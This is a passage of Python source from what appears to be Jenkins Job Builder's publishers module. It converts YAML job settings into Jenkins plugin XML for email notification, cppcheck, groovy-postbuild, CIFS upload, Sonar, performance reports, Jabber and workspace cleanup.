.. literalinclude::
/../../tests/publishers/fixtures/email-minimal.yaml
:language: yaml
.. literalinclude:: /../../tests/publishers/fixtures/email-complete.yaml
:language: yaml
"""
# TODO: raise exception if this is applied to a maven job
mailer = XML.SubElement(xml_parent,
'hudson.tasks.Mailer')
try:
XML.SubElement(mailer, 'recipients').text = data['recipients']
except KeyError as e:
raise MissingAttributeError(e)
# Note the logic reversal (included here to match the GUI
if data.get('notify-every-unstable-build', True):
XML.SubElement(mailer, 'dontNotifyEveryUnstableBuild').text = 'false'
else:
XML.SubElement(mailer, 'dontNotifyEveryUnstableBuild').text = 'true'
XML.SubElement(mailer, 'sendToIndividuals').text = str(
data.get('send-to-individuals', False)).lower()
def claim_build(parser, xml_parent, data):
"""yaml: claim-build
Claim build failures
Requires the Jenkins :jenkins-wiki:`Claim Plugin <Claim+plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/claim-build001.yaml
:language: yaml
"""
XML.SubElement(xml_parent, 'hudson.plugins.claim.ClaimPublisher')
def base_email_ext(parser, xml_parent, data, ttype):
trigger = XML.SubElement(xml_parent,
'hudson.plugins.emailext.plugins.trigger.'
+ ttype)
email = XML.SubElement(trigger, 'email')
XML.SubElement(email, 'recipientList').text = ''
XML.SubElement(email, 'subject').text = '$PROJECT_DEFAULT_SUBJECT'
XML.SubElement(email, 'body').text = '$PROJECT_DEFAULT_CONTENT'
if 'send-to' in data:
XML.SubElement(email, 'sendToDevelopers').text = \
str('developers' in data['send-to']).lower()
XML.SubElement(email, 'sendToRequester').text = \
str('requester' in data['send-to']).lower()
XML.SubElement(email, 'includeCulprits').text = \
str('culprits' in data['send-to']).lower()
XML.SubElement(email, 'sendToRecipientList').text = \
str('recipients' in data['send-to']).lower()
else:
XML.SubElement(email, 'sendToRequester').text = 'false'
XML.SubElement(email, 'sendToDevelopers').text = 'false'
XML.SubElement(email, 'includeCulprits').text = 'false'
XML.SubElement(email, 'sendToRecipientList').text = 'true'
def email_ext(parser, xml_parent, data):
"""yaml: email-ext
Extend Jenkin's built in email notification
Requires the Jenkins :jenkins-wiki:`Email-ext Plugin
<Email-ext+plugin>`.
:arg bool disable-publisher: Disable the publisher, while maintaining the
settings. The usage model for this is when you want to test things out
in the build, not send out e-mails during the testing. A message will
be printed to the build log saying that the publisher is disabled.
(default false)
:arg str recipients: Comma separated list of recipient email addresses
:arg str reply-to: Comma separated list of email addresses that should be
in the Reply-To header for this project (default $DEFAULT_REPLYTO)
:arg str content-type: The content type of the emails sent. If not set, the
Jenkins plugin uses the value set on the main configuration page.
Possible values: 'html', 'text', 'both-html-text' or 'default'
(default 'default')
:arg str subject: Subject for the email, can include variables like
${BUILD_NUMBER} or even groovy or javascript code
:arg str body: Content for the body of the email, can include variables
like ${BUILD_NUMBER}, but the real magic is using groovy or
javascript to hook into the Jenkins API itself
:arg bool attach-build-log: Include build log in the email (default false)
:arg str attachments: pattern of files to include as attachment (optional)
:arg bool always: Send an email for every result (default false)
:arg bool unstable: Send an email for an unstable result (default false)
:arg bool first-failure: Send an email for just the first failure
(default false)
:arg bool not-built: Send an email if not built (default false)
:arg bool aborted: Send an email if the build is aborted (default false)
:arg bool regression: Send an email if there is a regression
(default false)
:arg bool failure: Send an email if the build fails (default true)
:arg bool second-failure: Send an email for the second failure
(default false)
:arg bool improvement: Send an email if the build improves (default false)
:arg bool still-failing: Send an email if the build is still failing
(default false)
:arg bool success: Send an email for a successful build (default false)
:arg bool fixed: Send an email if the build is fixed (default false)
:arg bool still-unstable: Send an email if the build is still unstable
(default false)
:arg bool pre-build: Send an email before the build (default false)
:arg str presend-script: A Groovy script executed prior sending the mail.
(default '')
:arg bool save-output: Save email content to workspace (default false)
:arg str matrix-trigger: If using matrix projects, when to trigger
:matrix-trigger values:
* **both**
* **only-parent**
* **only-configurations**
:arg list send-to: list of recipients from the predefined groups
:send-to values:
* **developers** (disabled by default)
* **requester** (disabled by default)
* **culprits** (disabled by default)
* **recipients** (enabled by default)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/email-ext001.yaml
:language: yaml
"""
emailext = XML.SubElement(xml_parent,
'hudson.plugins.emailext.ExtendedEmailPublisher')
if 'recipients' in data:
XML.SubElement(emailext, 'recipientList').text = data['recipients']
else:
XML.SubElement(emailext, 'recipientList').text = '$DEFAULT_RECIPIENTS'
ctrigger = XML.SubElement(emailext, 'configuredTriggers')
if data.get('always', False):
base_email_ext(parser, ctrigger, data, 'AlwaysTrigger')
if data.get('unstable', False):
base_email_ext(parser, ctrigger, data, 'UnstableTrigger')
if data.get('first-failure', False):
base_email_ext(parser, ctrigger, data, 'FirstFailureTrigger')
if data.get('not-built', False):
base_email_ext(parser, ctrigger, data, 'NotBuiltTrigger')
if data.get('aborted', False):
base_email_ext(parser, ctrigger, data, 'AbortedTrigger')
if data.get('regression', False):
base_email_ext(parser, ctrigger, data, 'RegressionTrigger')
if data.get('failure', True):
base_email_ext(parser, ctrigger, data, 'FailureTrigger')
if data.get('second-failure', False):
base_email_ext(parser, ctrigger, data, 'SecondFailureTrigger')
if data.get('improvement', False):
base_email_ext(parser, ctrigger, data, 'ImprovementTrigger')
if data.get('still-failing', False):
base_email_ext(parser, ctrigger, data, 'StillFailingTrigger')
if data.get('success', False):
base_email_ext(parser, ctrigger, data, 'SuccessTrigger')
if data.get('fixed', False):
base_email_ext(parser, ctrigger, data, 'FixedTrigger')
if data.get('still-unstable', False):
base_email_ext(parser, ctrigger, data, 'StillUnstableTrigger')
if data.get('pre-build', False):
base_email_ext(parser, ctrigger, data, 'PreBuildTrigger')
content_type_mime = {
'text': 'text/plain',
'html': 'text/html',
'default': 'default',
'both-html-text': 'both',
}
ctype = data.get('content-type', 'default')
if ctype not in content_type_mime:
raise JenkinsJobsException('email-ext content type must be one of: %s'
% ', '.join(content_type_mime.keys()))
XML.SubElement(emailext, 'contentType').text = content_type_mime[ctype]
XML.SubElement(emailext, 'defaultSubject').text = data.get(
'subject', '$DEFAULT_SUBJECT')
XML.SubElement(emailext, 'defaultContent').text = data.get(
'body', '$DEFAULT_CONTENT')
XML.SubElement(emailext, 'attachmentsPattern').text = data.get(
'attachments', '')
XML.SubElement(emailext, 'presendScript').text = data.get(
'presend-script', '')
XML.SubElement(emailext, 'attachBuildLog').text = str(data.get(
'attach-build-log', False)).lower()
XML.SubElement(emailext, 'saveOutput').text = str(data.get(
'save-output', False)).lower()
XML.SubElement(emailext, 'disabled').text = str(data.get(
'disable-publisher', False)).lower()
XML.SubElement(emailext, 'replyTo').text = data.get('reply-to',
'$DEFAULT_REPLYTO')
matrix_dict = {'both': 'BOTH',
'only-configurations': 'ONLY_CONFIGURATIONS',
'only-parent': 'ONLY_PARENT'}
matrix_trigger = data.get('matrix-trigger', None)
# If none defined, then do not create entry
if matrix_trigger is not None:
if matrix_trigger not in matrix_dict:
raise JenkinsJobsException("matrix-trigger entered is not valid, "
"must be one of: %s" %
", ".join(matrix_dict.keys()))
XML.SubElement(emailext, 'matrixTriggerMode').text = \
matrix_dict.get(matrix_trigger)
def fingerprint(parser, xml_parent, data):
"""yaml: fingerprint
Fingerprint files to track them across builds
:arg str files: files to fingerprint, follows the @includes of Ant fileset
(default blank)
:arg bool record-artifacts: fingerprint all archived artifacts
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/fingerprint001.yaml
:language: yaml
"""
finger = XML.SubElement(xml_parent, 'hudson.tasks.Fingerprinter')
XML.SubElement(finger, 'targets').text = data.get('files', '')
XML.SubElement(finger, 'recordBuildArtifacts').text = str(data.get(
'record-artifacts', False)).lower()
def aggregate_tests(parser, xml_parent, data):
"""yaml: aggregate-tests
Aggregate downstream test results
:arg bool include-failed-builds: whether to include failed builds
Example:
.. literalinclude::
/../../tests/publishers/fixtures/aggregate-tests001.yaml
:language: yaml
"""
agg = XML.SubElement(xml_parent,
'hudson.tasks.test.AggregatedTestResultPublisher')
XML.SubElement(agg, 'includeFailedBuilds').text = str(data.get(
'include-failed-builds', False)).lower()
def aggregate_flow_tests(parser, xml_parent, data):
"""yaml: aggregate-flow-tests
Aggregate downstream test results in a Build Flow job.
Requires the Jenkins :jenkins-wiki:`Build Flow Test Aggregator Plugin
<Build+Flow+Test+Aggregator+Plugin>`.
:arg bool show-test-results-trend: whether to show test results
trend graph (default true)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/aggregate-flow-tests002.yaml
:language: yaml
"""
agg_flow = XML.SubElement(xml_parent, 'org.zeroturnaround.jenkins.'
'flowbuildtestaggregator.FlowTestAggregator')
XML.SubElement(agg_flow, 'showTestResultTrend').text = str(
data.get('show-test-results-trend', True)).lower()
def cppcheck(parser, xml_parent, data):
"""yaml: cppcheck
Cppcheck result publisher
Requires the Jenkins :jenkins-wiki:`Cppcheck Plugin <Cppcheck+Plugin>`.
:arg str pattern: file pattern for cppcheck xml report
for more optional parameters see the example
Example:
.. literalinclude:: /../../tests/publishers/fixtures/cppcheck001.yaml
:language: yaml
"""
cppextbase = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.cppcheck.'
'CppcheckPublisher')
cppext = XML.SubElement(cppextbase, 'cppcheckConfig')
XML.SubElement(cppext, 'pattern').text = data['pattern']
XML.SubElement(cppext, 'ignoreBlankFiles').text = \
str(data.get('ignoreblankfiles', False)).lower()
csev = XML.SubElement(cppext, 'configSeverityEvaluation')
thrsh = data.get('thresholds', {})
XML.SubElement(csev, 'threshold').text = str(thrsh.get('unstable', ''))
XML.SubElement(csev, 'newThreshold').text = \
str(thrsh.get('new-unstable', ''))
XML.SubElement(csev, 'failureThreshold').text = \
str(thrsh.get('failure', ''))
XML.SubElement(csev, 'newFailureThreshold').text = \
str(thrsh.get('new-failure', ''))
XML.SubElement(csev, 'healthy').text = str(thrsh.get('healthy', ''))
XML.SubElement(csev, 'unHealthy').text = str(thrsh.get('unhealthy', ''))
sev = thrsh.get('severity', {})
XML.SubElement(csev, 'severityError').text = \
str(sev.get('error', True)).lower()
XML.SubElement(csev, 'severityWarning').text = \
str(sev.get('warning', True)).lower()
XML.SubElement(csev, 'severityStyle').text = \
str(sev.get('style', True)).lower()
XML.SubElement(csev, 'severityPerformance').text = \
str(sev.get('performance', True)).lower()
XML.SubElement(csev, 'severityInformation').text = \
str(sev.get('information', True)).lower()
graph = data.get('graph', {})
cgraph = XML.SubElement(cppext, 'configGraph')
x, y = graph.get('xysize', [500, 200])
XML.SubElement(cgraph, 'xSize').text = str(x)
XML.SubElement(cgraph, 'ySize').text = str(y)
gdisplay = graph.get('display', {})
XML.SubElement(cgraph, 'displayAllErrors').text = \
str(gdisplay.get('sum', True)).lower()
XML.SubElement(cgraph, 'displayErrorSeverity').text = \
str(gdisplay.get('error', False)).lower()
XML.SubElement(cgraph, 'displayWarningSeverity').text = \
str(gdisplay.get('warning', False)).lower()
XML.SubElement(cgraph, 'displayStyleSeverity').text = \
str(gdisplay.get('style', False)).lower()
XML.SubElement(cgraph, 'displayPerformanceSeverity').text = \
str(gdisplay.get('performance', False)).lower()
XML.SubElement(cgraph, 'displayInformationSeverity').text = \
str(gdisplay.get('information', False)).lower()
def logparser(parser, xml_parent, data):
"""yaml: logparser
Requires the Jenkins :jenkins-wiki:`Log Parser Plugin <Log+Parser+Plugin>`.
:arg str parse-rules: full path to parse rules
:arg bool unstable-on-warning: mark build unstable on warning
:arg bool fail-on-error: mark build failed on error
Example:
.. literalinclude:: /../../tests/publishers/fixtures/logparser001.yaml
:language: yaml
"""
clog = XML.SubElement(xml_parent,
'hudson.plugins.logparser.LogParserPublisher')
XML.SubElement(clog, 'unstableOnWarning').text = \
str(data.get('unstable-on-warning', False)).lower()
XML.SubElement(clog, 'failBuildOnError').text = \
str(data.get('fail-on-error', False)).lower()
# v1.08: this must be the full path, the name of the rules is not enough
XML.SubElement(clog, 'parsingRulesPath').text = data.get('parse-rules', '')
def copy_to_master(parser, xml_parent, data):
"""yaml: copy-to-master
Copy files to master from slave
Requires the Jenkins :jenkins-wiki:`Copy To Slave Plugin
<Copy+To+Slave+Plugin>`.
:arg list includes: list of file patterns to copy
:arg list excludes: list of file patterns to exclude
:arg string destination: absolute path into which the files will be copied.
If left blank they will be copied into the
workspace of the current job
Example:
.. literalinclude::
/../../tests/publishers/fixtures/copy-to-master001.yaml
:language: yaml
"""
p = 'com.michelin.cio.hudson.plugins.copytoslave.CopyToMasterNotifier'
cm = XML.SubElement(xml_parent, p)
XML.SubElement(cm, 'includes').text = ','.join(data.get('includes', ['']))
XML.SubElement(cm, 'excludes').text = ','.join(data.get('excludes', ['']))
XML.SubElement(cm, 'destinationFolder').text = \
data.get('destination', '')
if data.get('destination', ''):
XML.SubElement(cm, 'overrideDestinationFolder').text = 'true'
def jira(parser, xml_parent, data):
"""yaml: jira
Update relevant JIRA issues
Requires the Jenkins :jenkins-wiki:`JIRA Plugin <JIRA+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/jira001.yaml
:language: yaml
"""
XML.SubElement(xml_parent, 'hudson.plugins.jira.JiraIssueUpdater')
def groovy_postbuild(parser, xml_parent, data):
"""yaml: groovy-postbuild
Execute a groovy script.
Requires the Jenkins :jenkins-wiki:`Groovy Postbuild Plugin
<Groovy+Postbuild+Plugin>`.
Please pay attention on version of plugin you have installed.
There were incompatible changes between 1.x and 2.x. Please see
:jenkins-wiki:`home page <Groovy+Postbuild+Plugin>` of this plugin
for full information including migration process.
:arg str script: The groovy script to execute
:arg list classpath: List of additional classpaths (>=1.6)
:arg str on-failure: In case of script failure leave build as it is
for "nothing" option, mark build as unstable
for "unstable" and mark job as failure for "failed"
(default is "nothing")
:arg bool matrix-parent: Run script for matrix parent only (>=1.9)
(default false)
:arg bool sandbox: Execute script inside of groovy sandbox (>=2.0)
(default false)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/groovy-postbuild001.yaml
:language: yaml
"""
logger = logging.getLogger("%s:groovy-postbuild" % __name__)
# Backward compatibility with old format
if isinstance(data, six.string_types):
logger.warn(
"You use deprecated configuration, please follow documentation "
"to change configuration. It is not going to be supported in "
"future releases!"
)
data = {
'script': data,
}
# There are incompatible changes, we need to know version
info = parser.registry.get_plugin_info('groovy-postbuild')
version = pkg_resources.parse_version(info.get('version', "0"))
# Version specific predicates
matrix_parent_support = version >= pkg_resources.parse_version("1.9")
security_plugin_support = version >= pkg_resources.parse_version("2.0")
extra_classpath_support = version >= pkg_resources.parse_version("1.6")
root_tag = (
'org.jvnet.hudson.plugins.groovypostbuild.GroovyPostbuildRecorder'
)
groovy = XML.SubElement(xml_parent, root_tag)
behavior = data.get('on-failure')
XML.SubElement(groovy, 'behavior').text = {
'unstable': '1',
'failed': '2',
}.get(behavior, '0')
if matrix_parent_support:
XML.SubElement(
groovy,
'runForMatrixParent',
).text = str(data.get('matrix-parent', False)).lower()
classpaths = data.get('classpath', list())
if security_plugin_support:
script = XML.SubElement(groovy, 'script')
XML.SubElement(script, 'script').text = data.get('script')
XML.SubElement(script, 'sandbox').text = str(
data.get('sandbox', False)
).lower()
if classpaths:
classpath = XML.SubElement(script, 'classpath')
for path in classpaths:
script_path = XML.SubElement(classpath, 'entry')
XML.SubElement(script_path, 'url').text = path
else:
XML.SubElement(groovy, 'groovyScript').text = data.get('script')
if extra_classpath_support and classpaths:
classpath = XML.SubElement(groovy, 'classpath')
for path in classpaths:
script_path = XML.SubElement(
classpath,
'org.jvnet.hudson.plugins.groovypostbuild.'
'GroovyScriptPath',
)
XML.SubElement(script_path, 'path').text = path
def base_publish_over(xml_parent, data, console_prefix,
plugin_tag, publisher_tag,
transferset_tag, reference_plugin_tag):
outer = XML.SubElement(xml_parent, plugin_tag)
XML.SubElement(outer, 'consolePrefix').text = console_prefix
delegate = XML.SubElement(outer, 'delegate')
publishers = XML.SubElement(delegate, 'publishers')
inner = XML.SubElement(publishers, publisher_tag)
XML.SubElement(inner, 'configName').text = data['site']
XML.SubElement(inner, 'verbose').text = 'true'
transfers = XML.SubElement(inner, 'transfers')
transfersset = XML.SubElement(transfers, transferset_tag)
XML.SubElement(transfersset, 'remoteDirectory').text = data['target']
XML.SubElement(transfersset, 'sourceFiles').text = data['source']
if 'command' in data:
XML.SubElement(transfersset, 'execCommand').text = data['command']
if 'timeout' in data:
XML.SubElement(transfersset, 'execTimeout').text = str(data['timeout'])
if 'use-pty' in data:
XML.SubElement(transfersset, 'usePty').text = \
str(data.get('use-pty', False)).lower()
XML.SubElement(transfersset, 'excludes').text = data.get('excludes', '')
XML.SubElement(transfersset, 'removePrefix').text = \
data.get('remove-prefix', '')
XML.SubElement(transfersset, 'remoteDirectorySDF').text = \
str(data.get('target-is-date-format', False)).lower()
XML.SubElement(transfersset, 'flatten').text = \
str(data.get('flatten', False)).lower()
XML.SubElement(transfersset, 'cleanRemote').text = \
str(data.get('clean-remote', False)).lower()
XML.SubElement(inner, 'useWorkspaceInPromotion').text = 'false'
XML.SubElement(inner, 'usePromotionTimestamp').text = 'false'
XML.SubElement(delegate, 'continueOnError').text = 'false'
XML.SubElement(delegate, 'failOnError').text = \
str(data.get('fail-on-error', False)).lower()
XML.SubElement(delegate, 'alwaysPublishFromMaster').text = \
str(data.get('always-publish-from-master', False)).lower()
XML.SubElement(delegate, 'hostConfigurationAccess',
{'class': reference_plugin_tag,
'reference': '../..'})
return (outer, transfersset)
def cifs(parser, xml_parent, data):
"""yaml: cifs
Upload files via CIFS.
Requires the Jenkins :jenkins-wiki:`Publish over CIFS Plugin
<Publish+Over+CIFS+Plugin>`.
:arg str site: name of the cifs site/share
:arg str target: destination directory
:arg bool target-is-date-format: whether target is a date format. If true,
raw text should be quoted (default false)
:arg bool clean-remote: should the remote directory be deleted before
transferring files (default false)
:arg str source: source path specifier
:arg str excludes: excluded file pattern (optional)
:arg str remove-prefix: prefix to remove from uploaded file paths
(optional)
:arg bool fail-on-error: fail the build if an error occurs (default false).
:arg bool flatten: only create files on the server, don't create
directories (default false).
Example:
.. literalinclude:: /../../tests/publishers/fixtures/cifs001.yaml
:language: yaml
"""
console_prefix = 'CIFS: '
plugin_tag = 'jenkins.plugins.publish__over__cifs.CifsPublisherPlugin'
publisher_tag = 'jenkins.plugins.publish__over__cifs.CifsPublisher'
transfer_tag = 'jenkins.plugins.publish__over__cifs.CifsTransfer'
plugin_reference_tag = 'jenkins.plugins.publish_over_cifs.' \
'CifsPublisherPlugin'
base_publish_over(xml_parent,
data,
console_prefix,
plugin_tag,
publisher_tag,
transfer_tag,
plugin_reference_tag)
def cigame(parser, xml_parent, data):
"""yaml: cigame
This plugin introduces a game where users get points
for improving the builds.
Requires the Jenkins :jenkins-wiki:`The Continuous Integration Game plugin
<The+Continuous+Integration+Game+plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/cigame.yaml
:language: yaml
"""
XML.SubElement(xml_parent, 'hudson.plugins.cigame.GamePublisher')
def sonar(parser, xml_parent, data):
"""yaml: sonar
Sonar plugin support.
Requires the Jenkins `Sonar Plugin.
<http://docs.sonarqube.org/display/SONAR/\
Analyzing+with+SonarQube+Scanner+for+Jenkins>`_
:arg str installation-name: name of the Sonar instance to use.(optional)
:arg str jdk: JDK to use (inherited from the job if omitted). (optional)
:arg str branch: branch onto which the analysis will be posted (optional)
:arg str language: source code language (optional)
:arg str root-pom: Root POM (default 'pom.xml')
:arg bool private-maven-repo: If true, use private Maven repository.
(default false)
:arg str maven-installation-name: name of the Maven installation to use
(optional)
:arg str maven-opts: options given to maven (optional)
:arg str additional-properties: sonar analysis parameters (optional)
:arg dict skip-global-triggers:
:Triggers: * **skip-when-scm-change** (`bool`): skip analysis when
build triggered by scm
* **skip-when-upstream-build** (`bool`): skip analysis when
build triggered by an upstream build
* **skip-when-envvar-defined** (`str`): skip analysis when
the specified environment variable is set to true
:arg str settings: Path to use as user settings.xml. It is possible to
provide a ConfigFileProvider settings file, see Example below. (optional)
:arg str global-settings: Path to use as global settings.xml. It is
possible to provide a ConfigFileProvider settings file, see Example
below. (optional)
Requires the Jenkins :jenkins-wiki:`Config File Provider Plugin
<Config+File+Provider+Plugin>`
for the Config File Provider "settings" and "global-settings" config.
This publisher supports the post-build action exposed by the Jenkins
Sonar Plugin, which is triggering a Sonar Analysis with Maven.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/sonar001.yaml
:language: yaml
"""
sonar = XML.SubElement(xml_parent, 'hudson.plugins.sonar.SonarPublisher')
if 'installation-name' in data:
XML.SubElement(sonar, 'installationName').text = data[
'installation-name']
if 'jdk' in data:
XML.SubElement(sonar, 'jdk').text = data['jdk']
XML.SubElement(sonar, 'branch').text = data.get('branch', '')
XML.SubElement(sonar, 'language').text = data.get('language', '')
XML.SubElement(sonar, 'rootPom').text = data.get('root-pom', 'pom.xml')
XML.SubElement(sonar, 'usePrivateRepository').text = str(
data.get('private-maven-repo', False)).lower()
if 'maven-installation-name' in data:
XML.SubElement(sonar, 'mavenInstallationName').text = data[
'maven-installation-name']
XML.SubElement(sonar, 'mavenOpts').text = data.get('maven-opts', '')
XML.SubElement(sonar, 'jobAdditionalProperties').text = \
data.get('additional-properties', '')
if 'skip-global-triggers' in data:
data_triggers = data['skip-global-triggers']
triggers = XML.SubElement(sonar, 'triggers')
XML.SubElement(triggers, 'skipScmCause').text = \
str(data_triggers.get('skip-when-scm-change', False)).lower()
XML.SubElement(triggers, 'skipUpstreamCause').text = \
str(data_triggers.get('skip-when-upstream-build', False)).lower()
XML.SubElement(triggers, 'envVar').text = \
data_triggers.get('skip-when-envvar-defined', '')
helpers.config_file_provider_settings(sonar, data)
def performance(parser, xml_parent, data):
"""yaml: performance
Publish performance test results from jmeter and junit.
Requires the Jenkins :jenkins-wiki:`Performance Plugin
<Performance+Plugin>`.
:arg int failed-threshold: Specify the error percentage threshold that
set the build failed. A negative value means
don't use this threshold (default 0)
:arg int unstable-threshold: Specify the error percentage threshold that
set the build unstable. A negative value means
don't use this threshold (default 0)
:arg dict report:
:(jmeter or junit): (`dict` or `str`): Specify a custom report file
(optional; jmeter default \**/*.jtl, junit default **/TEST-\*.xml)
Examples:
.. literalinclude:: /../../tests/publishers/fixtures/performance001.yaml
:language: yaml
.. literalinclude:: /../../tests/publishers/fixtures/performance002.yaml
:language: yaml
.. literalinclude:: /../../tests/publishers/fixtures/performance003.yaml
:language: yaml
"""
logger = logging.getLogger(__name__)
perf = XML.SubElement(xml_parent, 'hudson.plugins.performance.'
'PerformancePublisher')
XML.SubElement(perf, 'errorFailedThreshold').text = str(data.get(
'failed-threshold', 0))
XML.SubElement(perf, 'errorUnstableThreshold').text = str(data.get(
'unstable-threshold', 0))
parsers = XML.SubElement(perf, 'parsers')
for item in data['report']:
if isinstance(item, dict):
item_name = next(iter(item.keys()))
item_values = item.get(item_name, None)
if item_name == 'jmeter':
jmhold = XML.SubElement(parsers, 'hudson.plugins.performance.'
'JMeterParser')
XML.SubElement(jmhold, 'glob').text = str(item_values)
elif item_name == 'junit':
juhold = XML.SubElement(parsers, 'hudson.plugins.performance.'
'JUnitParser')
XML.SubElement(juhold, 'glob').text = str(item_values)
else:
logger.fatal("You have not specified jmeter or junit, or "
"you have incorrectly assigned the key value.")
sys.exit(1)
elif isinstance(item, str):
if item == 'jmeter':
jmhold = XML.SubElement(parsers, 'hudson.plugins.performance.'
'JMeterParser')
XML.SubElement(jmhold, 'glob').text = '**/*.jtl'
elif item == 'junit':
juhold = XML.SubElement(parsers, 'hudson.plugins.performance.'
'JUnitParser')
XML.SubElement(juhold, 'glob').text = '**/TEST-*.xml'
else:
logger.fatal("You have not specified jmeter or junit, or "
"you have incorrectly assigned the key value.")
sys.exit(1)
def join_trigger(parser, xml_parent, data):
"""yaml: join-trigger
Trigger a job after all the immediate downstream jobs have completed
:arg bool even-if-unstable: if true jobs will trigger even if some
downstream jobs are marked as unstable (default false)
:arg list projects: list of projects to trigger
:arg list publishers: list of triggers from publishers module that
defines projects that need to be triggered
Example:
.. literalinclude:: /../../tests/publishers/fixtures/join-trigger001.yaml
:language: yaml
"""
jointrigger = XML.SubElement(xml_parent, 'join.JoinTrigger')
joinProjectsText = ','.join(data.get('projects', ['']))
XML.SubElement(jointrigger, 'joinProjects').text = joinProjectsText
publishers = XML.SubElement(jointrigger, 'joinPublishers')
for pub in data.get('publishers', []):
for edited_node in create_publishers(parser, pub):
publishers.append(edited_node)
unstable = str(data.get('even-if-unstable', 'false')).lower()
XML.SubElement(jointrigger, 'evenIfDownstreamUnstable').text = unstable
def jabber(parser, xml_parent, data):
"""yaml: jabber
Integrates Jenkins with the Jabber/XMPP instant messaging protocol
Requires the Jenkins :jenkins-wiki:`Jabber Plugin <Jabber+Plugin>`.
:arg bool notify-on-build-start: Whether to send notifications
to channels when a build starts (default false)
:arg bool notify-scm-committers: Whether to send notifications
to the users that are suspected of having broken this build
(default false)
:arg bool notify-scm-culprits: Also send notifications to 'culprits'
from previous unstable/failed builds (default false)
:arg bool notify-upstream-committers: Whether to send notifications to
upstream committers if no committers were found for a broken build
(default false)
:arg bool notify-scm-fixers: Whether to send notifications to the users
that have fixed a broken build (default false)
:arg list group-targets: List of group targets to notify
:arg list individual-targets: List of individual targets to notify
:arg dict strategy: When to send notifications (default all)
:strategy values:
* **all** -- Always
* **failure** -- On any failure
* **failure-fixed** -- On failure and fixes
* **change** -- Only on state change
:arg dict message: Channel notification message (default summary-scm)
:message values:
* **summary-scm** -- Summary + SCM changes
* **summary** -- Just summary
* **summary-build** -- Summary and build parameters
* **summary-scm-fail** -- Summary, SCM changes, and failed tests
Example:
.. literalinclude:: /../../tests/publishers/fixtures/jabber001.yaml
:language: yaml
"""
j = XML.SubElement(xml_parent, 'hudson.plugins.jabber.im.transport.'
'JabberPublisher')
t = XML.SubElement(j, 'targets')
if 'group-targets' in data:
for group in data['group-targets']:
gcimt = XML.SubElement(t, 'hudson.plugins.im.'
'GroupChatIMMessageTarget')
XML.SubElement(gcimt, 'name').text = group
XML.SubElement(gcimt, 'notificationOnly').text = 'false'
if 'individual-targets' in data:
for individual in data['individual-targets']:
dimt = XML.SubElement(t, 'hudson.plugins.im.'
'DefaultIMMessageTarget')
XML.SubElement(dimt, 'value').text = individual
strategy = data.get('strategy', 'all')
strategydict = {'all': 'ALL',
'failure': 'ANY_FAILURE',
'failure-fixed': 'FAILURE_AND_FIXED',
'change': 'STATECHANGE_ONLY'}
if strategy not in strategydict:
raise JenkinsJobsException("Strategy entered is not valid, must be " +
"one of: all, failure, failure-fixed, or "
"change")
XML.SubElement(j, 'strategy').text = strategydict[strategy]
XML.SubElement(j, 'notifyOnBuildStart').text = str(
data.get('notify-on-build-start', False)).lower()
XML.SubElement(j, 'notifySuspects').text = str(
data.get('notify-scm-committers', False)).lower()
XML.SubElement(j, 'notifyCulprits').text = str(
data.get('notify-scm-culprits', False)).lower()
XML.SubElement(j, 'notifyFixers').text = str(
data.get('notify-scm-fixers', False)).lower()
XML.SubElement(j, 'notifyUpstreamCommitters').text = str(
data.get('notify-upstream-committers', False)).lower()
message = data.get('message', 'summary-scm')
messagedict = {'summary-scm': 'DefaultBuildToChatNotifier',
'summary': 'SummaryOnlyBuildToChatNotifier',
'summary-build': 'BuildParametersBuildToChatNotifier',
'summary-scm-fail': 'PrintFailingTestsBuildToChatNotifier'}
if message not in messagedict:
raise JenkinsJobsException("Message entered is not valid, must be one "
"of: summary-scm, summary, summary-build "
"or summary-scm-fail")
XML.SubElement(j, 'buildToChatNotifier', {
'class': 'hudson.plugins.im.build_notify.' + messagedict[message]})
XML.SubElement(j, 'matrixMultiplier').text = 'ONLY_CONFIGURATIONS'
def workspace_cleanup(parser, xml_parent, data):
"""yaml: workspace-cleanup (post-build)
Requires the Jenkins :jenkins-wiki:`Workspace Cleanup Plugin
<Workspace+Cleanup+Plugin>`.
The pre-build workspace-cleanup is available as a wrapper.
:arg list include: list of files to be included
:arg list exclude: list of files to be excluded
:arg bool dirmatch: Apply pattern to directories too (default false)
:arg list clean-if: clean depending on build status
:clean-if values:
* **success** (`bool`) (default true)
* **unstable** (`bool`) (default true)
* **failure** (`bool`) (default true)
* **aborted** (`bool`) (default true)
* **not-built** (`bool`) (default true)
:arg bool fail-build: Fail the build if the cleanup fails (default true)
:arg bool clean-parent: Cleanup matrix parent workspace (default false)
:arg str external-deletion-command: external deletion command to run
against files and directories
Example:
.. literalinclude::
/../../tests/publishers/fixtures/workspace-cleanup001.yaml
:language: yaml
"""
p = XML.SubElement(xml_parent,
'hudson.plugins.ws__cleanup.WsCleanup')
p.set("plugin", "ws-cleanup")
if "include" in data or "exclude" in data:
patterns = XML.SubElement(p, 'patterns')
for inc in data.get("include", []):
ptrn = XML.SubElement(patterns, 'hudson.plugins.ws__cleanup.Pattern')
XML.SubElement(ptrn, 'pattern').text = inc
XML.SubElement(ptrn, 'type').text = "INCLUDE"
for exc in data.get("exclude", []):
ptrn = XML.SubElement(patterns, 'hudson.plugins.ws__cleanup.Pattern')
XML.SubElement(ptrn, 'pattern').text = exc
XML.SubElement(ptrn, 'type').text = "EXCLUDE"
XML.SubElement(p, 'deleteDirs').text = \
str(data.get("dirmatch", False)).lower()
XML.SubElement(p, 'cleanupMatrixParent').text = \
str(data.get("clean-parent", False)).lower()
XML.SubElement(p, 'externalDelete').text = \
str(data.get('external-deletion-command', ''))
mask = [('success', 'cleanWhenSuccess'),
('unstable', 'cleanWhenUnstable'),
('failure', 'cleanWhenFailure'),
('not-built', 'cleanWhenNotBuilt'),
('aborted', 'cleanWhenAborted')]
clean = data.get('clean-if', [])
cdict = dict()
for d in clean:
cdict.update(d)
for k, v in mask:
XML.SubElement(p, v).text = str(cdict.pop(k, True)).lower()
if len(cdict) > 0:
raise ValueError('clean-if must be one of: %r' % list(mask.keys()))
if str(data.get("fail-build", False)).lower() == 'false':
